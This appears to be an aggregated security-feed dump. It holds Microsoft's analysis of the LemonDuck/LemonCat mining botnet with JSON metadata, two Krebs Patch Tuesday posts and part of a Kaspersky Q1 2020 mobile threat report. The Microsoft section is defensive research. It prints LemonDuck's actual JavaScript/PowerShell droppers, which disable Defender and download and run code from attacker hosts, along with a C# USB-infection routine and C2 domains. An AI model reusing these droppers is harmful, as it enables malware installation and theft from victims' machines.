The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. 
It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, their core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems. 
Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. 
These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. 
Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. 
These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. 
Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. 
**READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mmpc", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MMPC:E537BA51663A720821A67D2A4F7F7F0E", 
"href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2020-06-16T09:51:45", "description": "**Microsoft** today released software patches to plug at least 129 security holes in its **Windows** operating systems and supported software, by some accounts a record number of fixes in one go for the software giant. None of the bugs addressed this month are known to have been exploited or detailed prior to today, but there are a few vulnerabilities that deserve special attention -- particularly for enterprises and employees working remotely.\n\nJune marks the fourth month in a row that Microsoft has issued fixes to address more than 100 security flaws in its products. Eleven of the updates address problems Microsoft deems \"critical,\" meaning they could be exploited by malware or malcontents to seize complete, remote control over vulnerable systems without any help from users.\n\nA chief concern among the panoply of patches is a trio of vulnerabilities in the Windows file-sharing technology (a.k.a. Microsoft Server Message Block or \"SMB\" service). Perhaps most troubling of these ([CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>)) is a remote code execution bug in SMB capabilities built into **Windows 7** and **Windows Server 2008** systems -- both operating systems that Microsoft stopped supporting with security updates in January 2020. 
One mitigating factor with this flaw is that an attacker would need to be already authenticated on the network to exploit it, according to security experts at **Tenable**.\n\nThe SMB fixes follow closely on [news that proof-of-concept code was published this week](<https://arstechnica.com/information-technology/2020/06/exploiting-wormable-flaw-on-unpatched-windows-devices-is-about-to-get-easier/>) that would allow anyone to exploit a critical SMB flaw Microsoft patched for **Windows 10** systems in March ([CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>)). Unlike this month's critical SMB bugs, CVE-2020-0796 does not require the attacker to be authenticated to the target's network. And with countless company employees now working remotely, Windows 10 users who have not yet applied updates from March or later could be dangerously exposed right now.\n\n**Microsoft Office** and **Excel** get several updates this month. Two different flaws in Excel ([CVE-2020-1225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1225>) and [CVE-2020-1226](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1226>)) could be used to remotely commandeer a computer running Office just by getting a user to open a booby-trapped document. Another weakness ([CVE-2020-1229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1229>)) in most versions of Office may be exploited to bypass security features in Office simply by previewing a malicious document in the preview pane. This flaw also impacts **Office for Mac**, although updates are not yet available for that platform.\n\nAfter months of giving us a welcome break from patching, **Adobe** has issued [an update](<https://helpx.adobe.com/security/products/flash-player/apsb20-30.html>) for its **Flash Player** program that fixes a single, albeit critical security problem. 
Adobe says it is not aware of any active exploits against the Flash flaw. Mercifully, **Chrome** and **Firefox** both now disable Flash by default, and Chrome and **IE/Edge** auto-update the program when new security updates are available. Adobe is slated to retire Flash Player later this year. Adobe also released security updates for its [Experience Manager](<https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html>) and [Framemaker products](<https://helpx.adobe.com/security/products/framemaker/apsb20-32.html>).\n\nWindows 7 users should be aware by now that while a fair number of flaws addressed this month by Microsoft affect Windows 7 systems, this operating system is no longer being supported with security updates (unless you\u2019re an enterprise taking advantage of Microsoft\u2019s [paid extended security updates program](<https://support.microsoft.com/en-us/help/4527878/faq-about-extended-security-updates-for-windows-7>), which is available to Windows 7 Professional and Windows 7 Enterprise users).\n\nBefore you update with this month's patch batch, please make sure you have backed up your system and/or important files. It's not uncommon for a wonky Windows update to hose one's system or prevent it from booting properly, and some updates have even been known to erase or corrupt files. So do yourself a favor and back up _before_ installing any patches. 
Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).

As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there's a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.

Further reading:

[AskWoody](<https://www.askwoody.com/>) and [Martin Brinkmann](<https://www.ghacks.net/2020/06/09/microsoft-windows-security-updates-june-2020-overview/>) on Patch Tuesday fixes and potential pitfalls

[Trend Micro's Zero Day Initiative June 2020 patch lowdown](<https://www.zerodayinitiative.com/blog/2020/6/9/the-june-2020-security-update-review>)

[U.S-CERT on Active Exploitation of CVE-2020-0796](<https://www.us-cert.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>)

_Source: Krebs on Security, "Microsoft Patch Tuesday, June 2020 Edition", published 2020-06-10, <https://krebsonsecurity.com/2020/06/microsoft-patch-tuesday-june-2020-edition/>. CVEs covered: CVE-2020-0796, CVE-2020-1225, CVE-2020-1226, CVE-2020-1229, CVE-2020-1301._

**Microsoft** today released updates to fix 113 security vulnerabilities in its various **Windows** operating systems and related software.
Those include at least three flaws that are actively being exploited, as well as two others which were publicly detailed prior to today, potentially giving attackers a head start in figuring out how to exploit the bugs.

Nineteen of the weaknesses fixed on this Patch Tuesday were assigned Microsoft's most-dire "critical" rating, meaning malware or miscreants could exploit them to gain complete, remote control over vulnerable computers without any help from users.

Near the top of the heap is [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), a remotely exploitable bug in the **Adobe Font Manager** library that was first detailed in late March when Microsoft said it had seen the flaw being used in active attacks.

The Adobe Font Manager library is the source of yet another zero-day flaw -- [CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>) -- although experts at security vendor **Tenable** say there is currently no confirmation that the two are related to the same set of in-the-wild attacks. Both flaws could be exploited by getting a Windows user to open a booby-trapped document or view one in the Windows Preview Pane.

The other zero-day flaw ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) affects **Windows 7** and **Windows 10** systems, and earned a slightly less dire "important" rating from Microsoft because it's an "elevation of privilege" bug that requires the attacker to be locally authenticated.

Many security news sites are reporting that Microsoft addressed a total of four zero-day flaws this month, but it appears the advisory for a critical Internet Explorer flaw ([CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>)) has been revised to indicate Microsoft has not yet received reports of it being used in active attacks. However, the advisory says this IE bug is likely to be exploited soon.

Researchers at security firm **Recorded Future** zeroed in on [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>), a critical vulnerability dubbed "SMBGhost" that was rumored to exist in last month's Patch Tuesday but for which an out-of-band patch wasn't released until March 12. The problem resides in a file-sharing component of Windows, and could be exploited merely by sending the victim machine specially crafted data packets. Proof-of-concept code showing how to exploit the bug was released April 1, but so far there are no indications this method has been incorporated into malware or active attacks.

Recorded Future's **Allan Liska** notes that one reason these past few months have seen so many patches from Microsoft is the company [recently hired "SandboxEscaper,"](<https://twitter.com/SandboxBear/status/1210133985478791171>) a nickname used by the security researcher responsible for [releasing more than a half-dozen zero-day flaws](<https://arstechnica.com/information-technology/2019/05/serial-publisher-of-windows-0days-drops-exploits-for-3-more-unfixed-flaws/>) against Microsoft products last year.

"SandboxEscaper has made several contributions to this month's Patch Tuesday," Liska said. "This is great news for Microsoft and the security community at large."

Once again, Adobe has blessed us with a respite from updating its Flash Player program with security fixes. I look forward to the end of this year, when the company has promised to sunset this buggy and insecure program once and for all. Adobe did release security updates for its [ColdFusion, After Effects and Digital Editions software](<https://blogs.adobe.com/psirt/?p=1859>).

Speaking of buggy software platforms, **Oracle** has released a quarterly patch update to fix more than 400 security flaws across multiple products, including its **Java SE** program. If you've got Java installed and you need/want to keep it installed, please [make sure it's up-to-date](<https://java.com/en/download/help/java_update.xml#manual>).

Now for my obligatory disclaimers. Just a friendly reminder that while many of the vulnerabilities fixed in today's Microsoft patch batch affect Windows 7 operating systems -- including all three of the zero-day flaws -- this OS is no longer being supported with security updates (unless you're an enterprise taking advantage of Microsoft's [paid extended security updates program](<https://support.microsoft.com/en-us/help/4527878/faq-about-extended-security-updates-for-windows-7>), which is available to Windows 7 Professional and Windows 7 Enterprise users).

If you rely on Windows 7 for day-to-day use, it's time to think about upgrading to something newer. That something might be a computer with Windows 10. Or maybe you have always wanted that shiny MacOS computer.

If cost is a primary motivator and the user you have in mind doesn't do much with the system other than browsing the Web, perhaps a **Chromebook** or an older machine with a recent version of **Linux** is the answer (Ubuntu may be easiest for non-Linux natives). Whichever system you choose, it's important to pick one that fits the owner's needs and provides security updates on an ongoing basis.

Keep in mind that while staying up-to-date on Windows patches is a must, it's important to make sure you're updating only after you've backed up your important data and files. A reliable backup means you're not losing your mind when the odd buggy patch causes problems booting the system.

So do yourself a favor and back up your files before installing any patches.
Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there's a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Also, keep an eye on the [AskWoody blog](<https://www.askwoody.com/2020/february-2020-patch-tuesday-foibles/>) from **Woody Leonhard**, who keeps a close eye on buggy Microsoft updates each month.

Further reading:

[Qualys breakdown on April 2020 Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2020/04/14/april-2020-patch-tuesday-113-vulns-19-critical-0-day-patches-sharepoint-adobe-coldfusion>)

[SANS Internet Storm Center on Patch Tuesday](<https://isc.sans.org/forums/diary/Microsoft+April+2020+Patch+Tuesday/26022/>)

_Source: Krebs on Security, "Microsoft Patch Tuesday, April 2020 Edition", published 2020-04-14, <https://krebsonsecurity.com/2020/04/microsoft-patch-tuesday-april-2020-edition/>. CVEs covered: CVE-2020-0796, CVE-2020-0938, CVE-2020-0968, CVE-2020-1020, CVE-2020-1027._

_Source: Securelist (Kaspersky), record last seen 2020-05-20._

_These statistics are based on detection verdicts for Kaspersky products received from users who consented to providing statistical data._

## Quarterly figures

According to Kaspersky Security Network,

 * Kaspersky solutions blocked 726,536,269 attacks launched from online resources in 203 countries across the globe.
 * A total of 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.
 * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 249,748 unique users.
 * Ransomware attacks were defeated on the computers of 178,922 unique users.
 * Our File Anti-Virus detected 164,653,290 unique malicious and potentially unwanted objects.
 * Kaspersky products for mobile devices detected:
   * 1,152,662 malicious installation packages
   * 42,115 installation packages for mobile banking trojans
   * 4,339 installation packages for mobile ransomware trojans

## Mobile threats

### Quarter events

Q1 2020 will be remembered primarily for the coronavirus pandemic and cybercriminals' exploitation of the topic. In particular, the creators of a new modification of the Ginp banking trojan renamed their malware Coronavirus Finder and then began offering it for €0.75 disguised as an app supposedly capable of detecting nearby people infected with COVID-19.
Thus, the cybercriminals tried not only to scam users by exploiting hot topics, but also to gain access to their bank card details. And, because the trojan remains on the device after stealing this data, the cybercriminals could intercept text messages containing two-factor authorization codes and use the stolen data without the victim's knowledge.

Another interesting find this quarter was [Cookiethief](<https://securelist.com/cookiethief/96332/>), a trojan designed to steal cookies from mobile browsers and the Facebook app. In the event of a successful attack, the malware provided its handler with access to the victim's account, including the ability to perform various actions in their name, such as liking, reposting, etc. To prevent the service from spotting any abnormal activity in the hijacked profile, the trojan contains a proxy module through which the attackers issue commands.

The third piece of malware that caught our attention this reporting quarter was Trojan-Dropper.AndroidOS.Shopper.a. It is designed to [help cybercriminals to leave fake reviews and drive up ratings on Google Play](<https://securelist.com/smartphone-shopaholic/95544/>). The attackers' goals here are obvious: to increase the chances of their apps getting published and recommended, and to lull the vigilance of potential victims. Note that to rate apps and write reviews, the trojan uses Accessibility Services to gain full control over the other app: in this case, the official Google Play client.

### Mobile threat statistics

In Q1 2020, Kaspersky's mobile products and technologies detected 1,152,662 malicious installation packages, or 171,669 more than in the previous quarter.

_Number of malicious installation packages detected, Q1 2019 – Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13193928/sl_malware_report_01-kolichestvo-obnaruzhennyh-vredonosnyh-ustanovochnyh-paketov-q1-2019-q1-2019.png>)_

Starting in Q2 2019, we have seen a steady rise in the number of mobile threats detected. Although it is too early to sound the alarm (2019 saw the lowest number of new threats in recent years), the trend is concerning.

### Distribution of detected mobile apps by type

_Distribution of newly detected mobile programs by type, Q1 2020 and Q4 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194010/sl_malware_report_02-en-mobile-behavior.png>)_

Of all the threats detected in Q1, half were unwanted adware apps (49.9%), their share having increased by 19 p.p. compared to the previous quarter. Most often, we detected members of the HiddenAd and Ewind families, with a combined slice of 40% of all detected adware threats, as well as the FakeAdBlocker family (12%).

Potentially unwanted RiskTool apps (28.24%) took second place; the share of this type of threat remained almost unchanged. The Smsreg (49% of all detected threats of this class), Agent (17%) and Dnotua (11%) families were the biggest contributors. Note that in Q1, the number of detected members of the Smsreg family increased by more than 50 percent.

In third place were Trojan-Dropper-type threats (9.72%). Although their share decreased by 7.63 p.p. against the previous quarter, droppers remain one of the most common classes of mobile threats. Ingopack emerged as Q1's leading family with a massive 71% of all Trojan-Dropper threats, followed by Waponor (12%) and [Hqwar](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) (8%) far behind.

It is worth noting that mobile droppers are most often used for installing financial malware, although some financial threats can spread without their help. The share of these self-sufficient threats is quite substantial: in particular, the share of Trojan-Banker in Q1 increased by 2.1 p.p. to 3.65%.

### Top 20 mobile malware programs

_Note that these malware rankings do not include potentially dangerous or unwanted programs such as RiskTool or adware._

|    | **Verdict** | **%*** |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 44.89 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 9.09 |
| 3 | DangerousObject.AndroidOS.GenericML | 7.08 |
| 4 | Trojan-Downloader.AndroidOS.Necro.d | 4.52 |
| 5 | Trojan.AndroidOS.Hiddapp.ch | 2.73 |
| 6 | Trojan-Downloader.AndroidOS.Helper.a | 2.45 |
| 7 | Trojan.AndroidOS.Handda.san | 2.31 |
| 8 | Trojan-Dropper.AndroidOS.Necro.z | 2.30 |
| 9 | Trojan.AndroidOS.Necro.a | 2.19 |
| 10 | Trojan-Downloader.AndroidOS.Necro.b | 1.94 |
| 11 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.82 |
| 12 | Trojan-Dropper.AndroidOS.Helper.l | 1.50 |
| 13 | Exploit.AndroidOS.Lotoor.be | 1.46 |
| 14 | Trojan-Dropper.AndroidOS.Lezok.p | 1.46 |
| 15 | Trojan-Banker.AndroidOS.Rotexy.e | 1.43 |
| 16 | Trojan-Dropper.AndroidOS.Penguin.e | 1.42 |
| 17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.39 |
| 18 | Trojan.AndroidOS.Dvmap.a | 1.24 |
| 19 | Trojan.AndroidOS.Agent.rt | 1.21 |
| 20 | Trojan.AndroidOS.Vdloader.a | 1.18 |

_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products that were attacked._

First place in our Top 20 as ever went to DangerousObject.Multi.Generic (44.89%), the verdict we use for malware detected [using cloud technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). It is triggered when the antivirus databases still lack the data for detecting a malicious program, but the Kaspersky Security Network cloud already contains information about the object. This is basically how the latest malware is detected.

Second and third places were claimed by Trojan.AndroidOS.Boogr.gsh (9.09%) and DangerousObject.AndroidOS.GenericML (7.08%) respectively. These verdicts are assigned to files that are recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).

In fourth (Trojan-Downloader.AndroidOS.Necro.d, 4.52%) and tenth (Trojan-Downloader.AndroidOS.Necro.b, 1.94%) places are members of the Necro family, whose main task is to download and install modules from cybercriminal servers. Eighth-placed Trojan-Dropper.AndroidOS.Necro.z (2.30%) acts in a similar way, extracting from itself only those modules that it needs. As for Trojan.AndroidOS.Necro.a, which took ninth place (2.19%), cybercriminals assigned it a different task: the trojan follows advertising links and clicks banner ads in the victim's name.

Trojan.AndroidOS.Hiddapp.ch (2.73%) claimed fifth spot. As soon as it runs, the malware hides its icon on the list of apps and continues to operate in the background. The trojan's payload can be other trojan programs or adware apps.

Sixth place went to Trojan-Downloader.AndroidOS.Helper.a (2.45%), which is what Trojan-Downloader.AndroidOS.Necro usually delivers.
Helper.a is tasked with downloading arbitrary code from the cybercriminals' server and running it.

The verdict Trojan.AndroidOS.Handda.san (2.31%) in seventh place covers a group of diverse trojans that hide their icons, gain Device Admin rights on the device, and use packers to evade detection.

Trojan-Banker.AndroidOS.Rotexy.e (1.43%) and Trojan-Dropper.AndroidOS.Penguin.e (1.42%) warrant a special mention. The former is the only banking trojan in the top 20 this past quarter. The Rotexy family is all of six years old, and its members have the functionality to steal bank card details and intercept two-factor payment authorization messages. In turn, the first member of the Penguin dropper family was only detected last July and had gained significant popularity by Q1 2020.

### Geography of mobile threats

_Map of infection attempts by mobile malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194110/sl_malware_report_03-en-mobile-all-map.png>)_

**Top 10 countries by share of users attacked by mobile threats**

|    | **Country*** | **%**** |
|---|---|---|
| 1 | Iran | 39.56 |
| 2 | Algeria | 21.44 |
| 3 | Bangladesh | 18.58 |
| 4 | Nigeria | 15.58 |
| 5 | Lebanon | 15.28 |
| 6 | Tunisia | 14.94 |
| 7 | Pakistan | 13.99 |
| 8 | Kuwait | 13.91 |
| 9 | Indonesia | 13.81 |
| 10 | Cuba | 13.62 |

_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._
_** Unique users attacked as a percentage of all users of Kaspersky mobile products in the country._

In Q1 2020, the leader by share of attacked users was Iran (39.56%). Inhabitants of this country most frequently encountered adware apps from the Notifyer family, as well as Telegram clone apps. In second place was Algeria (21.44%), where adware apps were also distributed, but this time it was the HiddenAd and FakeAdBlocker families. Third place was taken by Bangladesh (18.58%), where half of the top 10 mobile threats consisted of adware in the HiddenAd family.

### Mobile banking trojans

During the reporting period, we detected **42,115** installation packages of mobile banking trojans. This is the highest value in the past 18 months, and more than 2.5 times higher than in Q4 2019. The largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Agent (42.79% of all installation packages detected), Trojan-Banker.AndroidOS.Wroba (16.61%), and Trojan-Banker.AndroidOS.Svpeng (13.66%) families.

